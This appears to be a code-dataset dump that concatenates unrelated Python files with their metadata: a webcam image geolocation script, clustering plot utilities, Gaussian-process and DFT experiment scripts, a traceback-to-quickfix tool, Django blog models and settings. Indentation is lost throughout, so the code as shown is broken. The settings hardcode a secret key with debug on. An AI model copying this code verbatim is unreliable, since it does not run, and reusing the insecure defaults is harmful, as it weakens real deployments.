return final_url
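# For illustration only (coordinates and key are made up), the generated URL
# has the shape:
#   https://maps.googleapis.com/maps/api/staticmap?key=...&size=500x400
#       &markers=color:blue%7Clabel:M%7C48.85,2.35
#       &markers=color:blue%7Clabel:M%7C40.71,-74.0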
def generate_JSON_file(located_images_list):
dest_file = open(OUTPUT_FILE_PATH, 'w')
json_data = json.dumps(located_images_list)
print >> dest_file, "var webeye = " + json_data
dest_file.close()
def remove_port_from_url(url):
parsed_url = urlparse(url)
if parsed_url.port == 80:
return parsed_url.scheme + "://" + parsed_url.netloc[:-3] + parsed_url.path
return parsed_url.geturl()
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", help="url to the image to predict")
group.add_argument("-f", help="path to file containing list of image urls")
group.add_argument("-n", type=int, default=6, help="number of url to import")
parser.add_argument("--static", action='store_true', help="output a google static map url")
args = parser.parse_args()
# parse arguments: one url or a list within a file ?
if args.u is not None:
url_list = [args.u]
elif args.f is not None:
url_list = get_url_list_from_file(args.f)
else:
url_list = cam_discovery.get_best_cam_urls(args.n)
# init ClarifAi app
print("Connecting to ClarifAi")
app = ClarifaiApp("", "")
model = app.models.get("general-v1.3")
geo_data = []
# parse each url
for img_url in url_list:
geo_concept = {}
img_url = remove_port_from_url(img_url)
print(img_url)
# get image url
geo_concept["url"] = img_url
# get lat / lon from IP or domain
geo_concept["location"] = get_location(img_url)
# get concepts in image
geo_concept["concepts"] = []
result = model.predict_by_url(url=img_url)
for concept in result["outputs"][0]["data"]["concepts"]:
print("{0:s}: {1:.2f}%".format(concept["name"], concept["value"]*100))
geo_concept["concepts"].append({"concept": str(concept["name"]), "probability": concept["value"]*100})
# feed the list
geo_data.append(geo_concept)
#TODO: use these data to generate a dynamic google map, including concepts data as tooltips
if args.static:
map_url = generate_map(geo_data)
print(map_url)
else:
# dynamic map
generate_JSON_file(geo_data)
|
gpl-3.0
| -3,981,476,711,404,548,000
| 27.53271
| 104
| 0.697674
| false
| 2.885633
| false
| false
| false
|
twankim/weaksemi
|
utils.py
|
1
|
7546
|
# -*- coding: utf-8 -*-
# @Author: twankim
# @Date: 2017-05-05 20:22:13
# @Last Modified by: twankim
# @Last Modified time: 2017-10-26 03:25:34
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
def accuracy(y_true,y_pred):
return 100*np.sum(y_true==y_pred)/float(len(y_true))
def mean_accuracy(y_true,y_pred):
labels = np.unique(y_true)
accuracy = np.zeros(len(labels))
hamming = y_true==y_pred
accuracy = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(accuracy)
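# Note: accuracy() above is the overall hit rate, while mean_accuracy() averages
# the per-class hit rates, so the two differ whenever the classes are unbalanced.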
def error(y_true,y_pred):
return 100*np.sum(y_true!=y_pred)/float(len(y_true))
def mean_error(y_true,y_pred):
labels = np.unique(y_true)
num_error = np.zeros(len(labels))
hamming = y_true!=y_pred
error = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(error)
# Find best matching permutation of y_pred clustering
# Also need to change mpp of algorithm
def find_permutation(dataset,algo):
# Calculate centers of original clustering
label_org = list(np.unique(dataset.y))
means_org = [np.mean(dataset.X[dataset.y==label,:],axis=0) for label in label_org]
labels_map = {} # Map from algorithm's label to true label
# Initialize label mapping
for label in xrange(algo.k+1):
labels_map[label] = 0
if len(algo.labels)==0:
return algo.y
for label,mpp in zip(algo.labels,algo.mpps):
# Calculate distance between estimated center and true centers
dist = [np.linalg.norm(mpp-mean_org) for mean_org in means_org]
# Assign true cluster label to the algorithm's label
idx_best = np.argmin(dist)
labels_map[label] = label_org[idx_best]
# Remove assigned label from the list
del means_org[idx_best]
del label_org[idx_best]
return [labels_map[y] for y in algo.y]
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def print_eval(eval_metric,res,etas,fname,
is_sum=False,weak='random',params=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_dist'
t_name = weak +' distance'
rep = res.shape[0]
if not is_sum:
df_res = pd.DataFrame(res.mean(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Averaged over {} experiments)>".format(
eval_metric,t_name, rep)
else:
df_res = pd.DataFrame(res.sum(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Total Sum over {} experiments)>".format(
eval_metric,t_name,rep)
print df_res
df_res.to_csv(fname)
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def plot_eval(eval_metric,res,etas,fig_name,
is_sum=False,weak='random',params=None,res_org=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
# cmap = plt.cm.get_cmap("jet", len(params)) -> cmap(i_p)
cmap = ['g','r','b','k','y','m','c']
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_{dist}'
t_name = weak + ' distance'
rep = res.shape[0]
if not is_sum:
res_plt = res.mean(axis=0)
res_org_plt = res_org.mean(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Averaged over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(original) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
else:
res_plt = res.sum(axis=0)
res_org_plt = res_org.sum(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Total sum over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
                         label=r'SSAC(original) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
if "accuracy" in eval_metric.lower():
plt.legend(loc=4)
min_val = min(res_plt.min(),res_org_plt.min())
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = min_val-(max_val-min_val)*0.55
ylim_max = max_val+(max_val-min_val)*0.05
elif ("error" in eval_metric.lower()) or ("fail" in eval_metric.lower()):
plt.legend(loc=1)
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = 0 - max_val*0.1
ylim_max = max_val*1.35
    else:
        plt.legend(loc=4)
        # no explicit y-limits are computed for other metrics
        ylim_min, ylim_max = None, None
    if ylim_min is not None:
        plt.ylim([ylim_min,ylim_max])
plt.xlim([0,np.round(1.2*max(etas))])
f.savefig(fig_name,bbox_inches='tight')
def plot_hist(gammas,min_gamma,max_gamma,fig_name):
rep = len(gammas)
if rep>40:
n_bins = int(rep/20)
else:
n_bins = 10
f = plt.figure()
plt.hist(gammas,normed=False,bins=n_bins)
plt.title(r"Histogram of $\gamma$. min={}, max={} ({} generation)".format(min_gamma,max_gamma,rep))
plt.xlabel(r"$\gamma$")
plt.ylabel("Number of data generations")
f.savefig(fig_name,bbox_inches='tight')
def plot_cluster(X,y_true,y_pred,k,mpps,gamma,title,f_name,verbose,classes=None):
if classes is not None:
classes = classes
else:
classes = range(k+1)
cmap = plt.cm.get_cmap("jet", k+1)
if verbose:
print " ... Plotting"
f = plt.figure(figsize=(14,7))
plt.suptitle(title)
# Plot original clustering (k-means)
plt.subplot(121)
for i in xrange(1,k+1):
idx = y_true==i
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_true,label=classes)
plt.title("True dataset ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot SSAC result
plt.subplot(122)
for i in xrange(0,k+1):
idx = np.array(y_pred)==i
if sum(idx)>0:
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_pred,label=classes)
plt.title("SSAC result ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot estimated cluster centers
for t in xrange(k):
mpp = mpps[t]
plt.plot(mpp[0],mpp[1],'k^',ms=15,alpha=0.7)
f.savefig(f_name,bbox_inches='tight')
plt.close()
|
mit
| -8,352,230,938,918,783,000
| 33.456621
| 103
| 0.550225
| false
| 3.100247
| false
| false
| false
|
sparseMCMC/NIPS2015
|
experiments/spatial/spatial_demo.py
|
1
|
9549
|
import numpy as np
import GPy
from mcmcGP import BinnedPoisson, GPMCMC, SGPMCMC, HMC, AHMC
from itertools import product
from IPython import embed
from scipy.cluster.vq import kmeans
import pyhmc
def load_pines():
X = np.load('pines.np')
return X
def build_vb(initialZ, binMids, binSize, counts, seed):
np.random.seed(seed)
lik = BinnedPoisson(binSize)
kern = getKern(False)
return GPy.core.SVGP(X=binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def optimize_vb(m, max_iters=1000):
m.Z.fix()
m.kern.fix()
m.optimize('bfgs', max_iters=max_iters, messages=True)
m.Z.unfix()
m.kern.constrain_positive()
m.optimize('bfgs', max_iters=max_iters, messages=True)
return m
def get_samples_vb(m, num_samples):
mu, var = m._raw_predict(m.X)
samples = np.random.randn(mu.shape[0], num_samples)*np.sqrt(var) + mu
return samples
def get_samples_mc(m, samples, numsamples):
ms, vs = [],[]
for s in samples:
m.optimizer_array = s
mui, vi = m.predict_raw(m.X)
vi = np.clip(vi, 0, np.inf)
ms.append(mui); vs.append(vi)
samples = np.hstack([np.random.randn(mu.shape[0], numsamples)*np.sqrt(var) + mu for mu, var in zip(ms, vs)])
return samples
def get_samples_mc_full(m, samples):
Fs = []
for s in samples:
m.optimizer_array = s
Fs.append(m.F)
return np.hstack(Fs)
def getPriors():
return {'rbf_lengthscale': GPy.priors.Gamma(1.75,1.), 'rbf_variance': GPy.priors.Gamma(1.2, 1) }
def getKern(isBayesian):
kern = GPy.kern.RBF(2, lengthscale=1.)+GPy.kern.White(2, 1e-2)
priors = getPriors()
if isBayesian:
kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
kern.rbf.variance.set_prior(priors['rbf_variance'])
kern.white.variance.fix(1e-6)
return kern
def build_mc_sparse(initialZ, binMids, binSize, counts, seed):
kern = getKern(True)
lik = BinnedPoisson(binSize)
return SGPMCMC(binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def build_mc_exact( binMids, binSize, counts, seed):
kern = getKern(False)
lik = BinnedPoisson(binSize)
return GPMCMC( X = binMids, Y=counts.reshape(-1,1), kernel = kern, likelihood = lik )
def init_mc_model_from_vb(m_mcmc, m_vb):
    # take the optimized vb model, and use it to init the mcmc model
m_mcmc.kern[:] = m_vb.kern[:]
m_mcmc.Z[:] = m_vb.Z[:]
m_mcmc.Z.fix()
L = GPy.util.choleskies.flat_to_triang(m_vb.q_u_chol)[0,:,:]
u_sample = np.dot(L, np.random.randn(m_vb.num_inducing))
u_sample += m_vb.q_u_mean.flatten()
L = GPy.util.linalg.jitchol(m_mcmc.kern.K(m_mcmc.Z))
v_sample, _ = GPy.util.linalg.dtrtrs(L, u_sample)
m_mcmc.V[:] = v_sample.reshape(-1,1)
return m_mcmc
def init_exact_mc_model_from_vb( m_mcmc_exact, m_vb ):
#This should speed things up a bit.
m_mcmc_exact.kern[:] = m_vb.kern[:]
function_sample = get_samples_vb( m_vb, 1).flatten()
L = GPy.util.linalg.jitchol(m_mcmc_exact.kern.K(m_mcmc_exact.X))
v_sample , _ = GPy.util.linalg.dtrtrs(L, function_sample)
m_mcmc_exact.V[:] = v_sample.reshape(-1,1)
return m_mcmc_exact
def convertData(X, binsPerDimension):
Y = np.histogramdd( X, bins = (binsPerDimension,binsPerDimension), range = ( (0, 1.) , (0., 1.) ) )
return Y[0].reshape( Y[0].shape[0] * Y[0].shape[1] )
def getInitialInducingGrid( nInducingPoints ):
assert( np.sqrt( nInducingPoints ) == np.floor( np.sqrt( nInducingPoints ) ) ) # check nInducingPoints is a square number.
sqrtNInducingPoints = int( np.floor( np.sqrt( nInducingPoints ) ) )
return getGrid( sqrtNInducingPoints )[1]
def getGrid( nPointsPerDim ):
linearValues = np.linspace( 0., 1., nPointsPerDim+1 )
binEdges = np.array( [ np.array( elem ) for elem in product(linearValues,linearValues) ] )
offsetValues = linearValues[:-1] + 0.5*np.diff( linearValues )[0]
binMids = np.array( [ np.array( elem ) for elem in product(offsetValues,offsetValues) ] )
return binEdges*10., binMids*10.
def run_hmc(m, N, epsilon, Lmax):
def f(x):
return (-a for a in m._objective_grads(x))
samples, rate = HMC(f, N, Lmax=Lmax, epsilon=epsilon, x0=m.optimizer_array, verbose=True)
return samples
def priorSample():
binsPerDimension = 32
num_samples = 5
bin_edges, bin_mids = getGrid( binsPerDimension )
np.random.seed(1)
#There is almost certainly a better way to do this but tempus fugit.
priors = getPriors()
kern = getKern(True)
binArea = np.square( (bin_edges[0,1] - bin_edges[1,1] ) )
from matplotlib import pyplot as plt
for sampleIndex in range(num_samples):
print "\n sample index ", sampleIndex, "\n"
kern.rbf.lengthscale = priors['rbf_lengthscale'].rvs(1)
kern.rbf.variance = priors['rbf_variance'].rvs(1)
        # note: getKern() builds an RBF + White kernel with no bias term,
        # so there is no bias variance prior to sample here
L = GPy.util.linalg.jitchol(kern.K(bin_mids))
functionSample = np.dot(L, np.random.randn( bin_mids.shape[0] ) )
intensities = np.exp( functionSample )
countSample = np.random.poisson( intensities * binArea )
print "Total counts ", np.sum( countSample )
squareIntensities = intensities.reshape( (binsPerDimension, binsPerDimension ))
squareCounts = countSample.reshape( (binsPerDimension, binsPerDimension ))
plt.figure()
plt.imshow( squareCounts, interpolation='nearest')
plt.title( "Prior sample "+ str(sampleIndex) )
plt.colorbar()
plt.figure()
plt.imshow( squareIntensities, interpolation='nearest')
plt.colorbar()
plt.title( "Prior sample "+ str(sampleIndex) )
class Experiment:
def __init__(self, seed, binsPerDimension , num_inducing, num_samples, vb_iterations, isExact=False):
self.seed, self.binsPerDimension, self.num_inducing, self.num_samples, self.isExact = seed, binsPerDimension, num_inducing, num_samples, isExact
np.random.seed(seed)
X = load_pines()
#will need to change bins to be two dimensional.
self.Y = convertData(X, binsPerDimension)
binEdges, bin_mids = getGrid( binsPerDimension )
initialZ = getInitialInducingGrid( num_inducing )
#setup and optimize VB model.
binArea = np.square( (binEdges[0,1] - binEdges[1,1] ) )
if not(isExact):
self.m_vb = build_vb(initialZ, bin_mids, binArea , self.Y, seed)
self.m_vb = optimize_vb(self.m_vb,vb_iterations)
self.fsamples_vb = get_samples_vb(self.m_vb, 1000)
self.m_mc = build_mc_sparse(initialZ, bin_mids, binArea, self.Y, seed)
self.m_mc = init_mc_model_from_vb(self.m_mc, self.m_vb)
self.samples = run_hmc(self.m_mc, num_samples, 0.125, Lmax = 20)
self.fsamples_mc = get_samples_mc(self.m_mc, self.samples[50::2], 10)
else:
priors = getPriors()
self.m_mc = build_mc_exact( bin_mids, binArea, self.Y, seed )
self.m_mc.kern.rbf.lengthscale.fix(1.)
self.m_mc.kern.rbf.variance.fix(1.)
self.m_mc.kern.white.variance.fix(1e-3)
self.m_mc.optimize('bfgs',messages=True,max_iters = 10000)
self.m_mc.kern.rbf.lengthscale.constrain_positive()
self.m_mc.kern.rbf.variance.constrain_positive()
self.m_mc.kern.white.variance.constrain_positive()
self.m_mc.kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
self.m_mc.kern.rbf.variance.set_prior(priors['rbf_variance'])
self.m_mc.kern.white.variance.fix(1e-3)
self.samples = run_hmc(self.m_mc, num_samples, epsilon=0.1 , Lmax = 20)
#priorSample()
if __name__ == "__main__":
num_samples = 2000
num_vb_iterations = [10000]
Ms = [225]
grids = [64]
#grids = [32]
seeds = [0]
isExact=False
experiments = [Experiment(seed, binsPerDimension=ng, num_inducing=M, num_samples=num_samples, vb_iterations=vb_iterations, isExact=isExact) for seed in seeds for ng in grids for M in Ms for vb_iterations in num_vb_iterations]
#from matplotlib import pyplot as plt
for e in experiments:
#plt.figure()
intensities = np.exp(e.fsamples_mc)*e.m_mc.likelihood.binsize
std = np.std(intensities, axis=1)
intensities = np.mean(intensities,axis=1)
squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensity')
np.savetxt( 'intensity_grid%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),intensities, delimiter=',')
np.savetxt( 'intensity_std%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),std, delimiter=',')
#plt.figure()
#intensities = np.mean(np.exp(e.fsamples_vb)*e.m_mc.likelihood.binsize,axis=1)
#squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensityi vb')
#np.savetxt( 'intensity_vb_grid%i_M%i_numsamp%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples),intensities, delimiter=',')
|
gpl-2.0
| 6,435,820,772,835,654,000
| 41.066079
| 229
| 0.640591
| false
| 2.921971
| false
| false
| false
|
robwarm/gpaw-symm
|
gpaw/test/big/tpss/tpss.py
|
1
|
3276
|
from ase import Atoms
from ase.structure import molecule
from ase.parallel import paropen
from gpaw import GPAW, Mixer, MixerDif
from gpaw.utilities.tools import split_formula
cell = [14.4, 14.4, 14.4]
data = paropen('data.txt', 'a')
##Reference from J. Chem. Phys. Vol 120 No. 15, 15 April 2004, page 6898
tpss_de = [
('H2' , 112.9),
('LiH', 59.1),
('OH' , 106.8),
('HF' , 139.1),
('Li2', 22.5),
('LiF', 135.7),
('Be2', 8.1),
('CO' , 254.2),
('N2' , 227.7),
('O2' , 126.9),
('F2' , 46.4),
('P2' , 116.1),
('Cl2', 60.8)
]
exp_bonds_dE = [
('H2' , 0.741,109.5),
('LiH', 1.595,57.8),
('OH' , 0.970,106.4),
('HF' , 0.917,140.8),
('Li2', 2.673,24.4),
('LiF', 1.564,138.9),
('Be2', 2.440,3.0),
('CO' , 1.128,259.3),
('N2' , 1.098,228.5),
('O2' , 1.208,120.5),
('F2' , 1.412,38.5),
('P2' , 1.893,117.3),
('Cl2', 1.988,58.0)
]
systems = [ a[0] for a in tpss_de ]
ref = [ a[1] for a in tpss_de ]
# Add atoms
for formula in systems:
temp = split_formula(formula)
for atom in temp:
if atom not in systems:
systems.append(atom)
energies = {}
# Calculate energies
i = 0
for formula in systems:
if formula == 'Be2':
loa = Atoms('Be2', [(0, 0, 0), (0, 0, 2.0212)])
else:
loa = molecule(formula)
loa.set_cell(cell)
loa.center()
width = 0.0
calc = GPAW(h=.18,
nbands=-5,
maxiter=333,
xc='PBE',
txt=formula + '.txt')
if len(loa) == 1:
calc.set(hund=True)
calc.set(fixmom=True)
calc.set(mixer=MixerDif())
calc.set(eigensolver='cg')
else:
calc.set(mixer=Mixer())
pos = loa.get_positions()
pos[1,:] = pos[0,:] + [exp_bonds_dE[i][1],0.0,0.0]
loa.set_positions(pos)
loa.center()
loa.set_calculator(calc)
try:
energy = loa.get_potential_energy()
difft = calc.get_xc_difference('TPSS')
diffr = calc.get_xc_difference('revTPSS')
diffm = calc.get_xc_difference('M06L')
energies[formula]=(energy, energy+difft, energy+diffr,energy+diffm)
except:
print >>data, formula, 'Error'
else:
print >>data, formula, energy, energy+difft, energy+diffr, energy+diffm
data.flush()
i += 1
#calculate atomization energies
ii =0
file = paropen('atom_en.dat', 'a')
print >>file, "# formula \t PBE \t TPSS \t revTPSS \t M06L \t Exp"
for formula in systems[:13]:
try:
atoms_formula = split_formula(formula)
de_tpss = -1.0 * energies[formula][1]
de_revtpss = -1.0 * energies[formula][2]
de_m06l = -1.0 * energies[formula][3]
de_pbe = -1.0 * energies[formula][0]
for atom_formula in atoms_formula:
de_tpss += energies[atom_formula][1]
de_revtpss += energies[atom_formula][2]
de_m06l += energies[atom_formula][3]
de_pbe += energies[atom_formula][0]
except:
print >>file, formula, 'Error'
else:
de_tpss *= 627.5/27.211
de_revtpss *= 627.5/27.211
de_m06l *= 627.5/27.211
de_pbe *= 627.5/27.211
out = "%s\t%.1f \t%.1f \t%.1f \t%.1f \t%.1f" %(formula, de_pbe, de_tpss, de_revtpss, de_m06l ,exp_bonds_dE[ii][2])
print >>file, out
file.flush()
ii += 1
|
gpl-3.0
| -2,241,574,817,692,573,400
| 26.3
| 122
| 0.545482
| false
| 2.545455
| false
| false
| false
|
tonyxty/quickfix.py
|
src/quickfix_py/cli.py
|
1
|
4853
|
#!/usr/bin/env python3
"""Run a Python script and format the exception traceback as Vim quickfix.
quickfix.py
Copyright (C) 2015 Tony Beta Lambda <tonybetalambda@gmail.com>
This file is licensed under the MIT license. See LICENSE for more details.
"""
import os
import sys
import functools
import argparse
from runpy import run_path
from traceback import extract_tb
from contextlib import redirect_stdout
from quickfix_py import __version__
def run(filename, catch_interrupt=False):
exceptions = (
(Exception, KeyboardInterrupt) if catch_interrupt else Exception
)
try:
run_path(filename, run_name="__main__")
except exceptions:
_, e, tb = sys.exc_info()
return e, extract_tb(tb)[3:]
def extract_error_location(exc, filename_filter=None):
e, tb = exc
if isinstance(e, SyntaxError):
# yield the line triggering SyntaxError
yield (e.filename, e.lineno, "{}: {}".format(type(e).__name__, e.msg))
if tb is not None:
r = (
(filename, lineno, "in function " + fnname)
for filename, lineno, fnname, text in tb
if text is not None
)
if filename_filter is not None:
r = (_ for _ in r if filename_filter(_[0]))
r = list(r)
try:
filename, lineno, _ = r.pop()
except IndexError:
return
# insert error message to the first returned location
yield filename, lineno, "{}: {}".format(type(e).__name__, e)
yield from reversed(r)
# writable by user and directory components do not start with a dot
@functools.lru_cache(maxsize=32)
def is_user_heuristic(filename):
return os.access(filename, os.W_OK) and not any(
s != "." and s.startswith(".") for s in filename.split(os.sep)
)
def get_parser():
"""Defines options for quickfix.py."""
parser = argparse.ArgumentParser(
prog="quickfix.py",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=(
"run a Python script and format the exception "
"traceback as Vim quickfix"
),
epilog="Fork me on GitHub: https://github.com/tonyxty/quickfix.py",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="be more verbose"
)
parser.add_argument(
"-V",
"--version",
action="version",
version="%(prog)s {}".format(__version__),
)
parser.add_argument("-o", "--output", help="specify quickfix output file")
parser.add_argument(
"-i",
"--interrupt",
action="store_true",
help="catch ^C (useful when locating an infinite loop)",
)
parser.add_argument(
"-a",
"--all",
action="store_true",
help="print all files instead of just user files",
)
parser.add_argument(
"-f",
"--fuck",
action="store_true",
help=(
"print a line of command that opens $EDITOR / sensible-editor "
"at the last error location"
),
)
return parser
def main(args=None):
invocation = sys.argv[0]
parser = get_parser()
(options, args) = parser.parse_known_args(args)
if invocation == "thefuck.py":
options.fuck = True
sys.argv[:] = args
if len(args) > 0 and (args[0] == "python3" or args[0] == "python"):
filename_index = 1
else:
filename_index = 0
try:
filename = args[filename_index]
except IndexError:
if options.fuck:
print("#", end=" ")
print("no file given")
return 2
if options.output is not None:
exc = run(filename, options.interrupt)
else:
# suppress output of exec'ed script
with open(os.devnull, "w") as f:
with redirect_stdout(f):
exc = run(filename, options.interrupt)
if exc is not None:
filename_filter = None if options.all else is_user_heuristic
err_locs = extract_error_location(exc, filename_filter)
if options.output is not None:
outfile = open(options.output, "w")
else:
outfile = sys.stdout
if options.fuck:
try:
filename, lineno, _ = next(err_locs)
except StopIteration:
print("# no fuck given", file=outfile)
            else:
                print(
                    os.getenv("EDITOR", "sensible-editor")
                    + " {} +{}".format(filename, lineno),
                    file=outfile,
                )
else:
print(
"\n".join('"{}":{}: {}'.format(*loc) for loc in err_locs),
file=outfile,
)
if outfile is not sys.stdout:
outfile.close()
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
mit
| -1,281,120,865,517,804,500
| 27.715976
| 78
| 0.564187
| false
| 4.010744
| false
| false
| false
|
jamessqr/james-squires-dotcom
|
blog/models.py
|
1
|
1065
|
from django.db import models
import datetime
class Category(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
slug = models.SlugField()
description = models.TextField()
class Meta:
ordering = ['title']
verbose_name_plural = "Categories"
class Admin:
pass
#TODO: This does not work!
#class CategoryAdmin(admin.ModelAdmin):
#prepopulated_fields = {"slug": ("title",)}
def __unicode__(self):
return self.title
    def get_absolute_url(self):
return "/categories/%s/" % self.slug
class Entry(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
excerpt = models.TextField(blank=True)
body = models.TextField()
slug = models.SlugField()
pub_date = models.DateTimeField(default=datetime.datetime.now)
class Meta:
ordering = ['title']
verbose_name_plural = "Entries"
class Admin:
pass
def __unicode__(self):
return self.title
def get_absolute_url(self):
return "/%s/%s" % (self.pub_date.strftime("%Y/%m/%d").lower(),self.slug)
|
bsd-3-clause
| -5,629,373,321,651,460,000
| 23.227273
| 77
| 0.694836
| false
| 3.237082
| false
| false
| false
|
daniel-e/papershelf
|
dialogs/settings.py
|
1
|
2638
|
import pygtk
pygtk.require('2.0')
import gtk
class DialogSettings(gtk.Dialog):
def __init__(self, title, parent, flag, settings):
gtk.Dialog.__init__(self, title, parent, flag)
s = settings
self.s = s
t = gtk.Table(rows = 3, columns = 3)
t.set_col_spacings(10)
t.set_row_spacings(10)
l = gtk.Label("PDF Viewer:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 0, 1)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfviewer"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 0, 1)
l.show()
self.pdf_viewer = l
l = gtk.Label("PDF Location:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 1, 2)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdflocation"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 1, 2)
l.show()
self.pdf_location = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_location, None)
t.attach(b, 2, 3, 1, 2)
# ----
l = gtk.Label("Preview converter:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 2, 3)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfconvert"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 2, 3)
l.show()
self.pdf_convert = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_convert, None)
t.attach(b, 2, 3, 2, 3)
# ----
self.vbox.pack_start(t)
t.show()
self.add_button("Ok", 1)
self.add_button("Cancel", 2)
def show(self):
if self.run() == 1:
s = self.s
s.vars["pdfviewer"] = self.pdf_viewer.get_text()
s.vars["pdflocation"] = self.pdf_location.get_text()
s.vars["pdfconvert"] = self.pdf_convert.get_text()
s.commit()
self.destroy()
def choose_pdf_location(self, widget, data = None):
f = gtk.FileChooserDialog("Select a directory", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_location.set_text(f.get_current_folder())
f.destroy()
def choose_pdf_convert(self, widget, data = None):
f = gtk.FileChooserDialog("Select an executable", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
#f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_convert.set_text(f.get_filename())
f.destroy()
|
gpl-2.0
| 9,119,678,909,674,186,000
| 26.768421
| 89
| 0.590978
| false
| 2.779768
| false
| false
| false
|
PAHB/SIgma-Nu-idea-1
|
Backend_stuff/sigma_nu/sigma_nu/settings.py
|
1
|
3345
|
"""
Django settings for sigma_nu project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd8&u=e=t2&3qdmj^eq*!+r^79sske#)2uul@4i98jhb)z*alsk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
